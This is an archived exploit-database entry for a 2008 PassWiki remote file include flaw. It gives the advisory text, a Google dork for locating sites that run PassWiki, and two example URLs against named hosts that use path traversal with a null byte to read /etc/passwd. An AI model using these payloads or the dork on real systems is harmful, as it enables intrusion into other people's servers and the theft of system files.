header-logo
Suggest Exploit
vendor:
PassWiki
by:
mozi2weed@yahoo.com
8.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PassWiki
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PassWiki Remote File Include Vulnerability

PassWiki is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

No known mitigation is available.
Source

Exploit-DB raw data:

dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00


author:mozi2weed@yahoo.com
http://rstzone.org

# milw0rm.com [2008-05-31]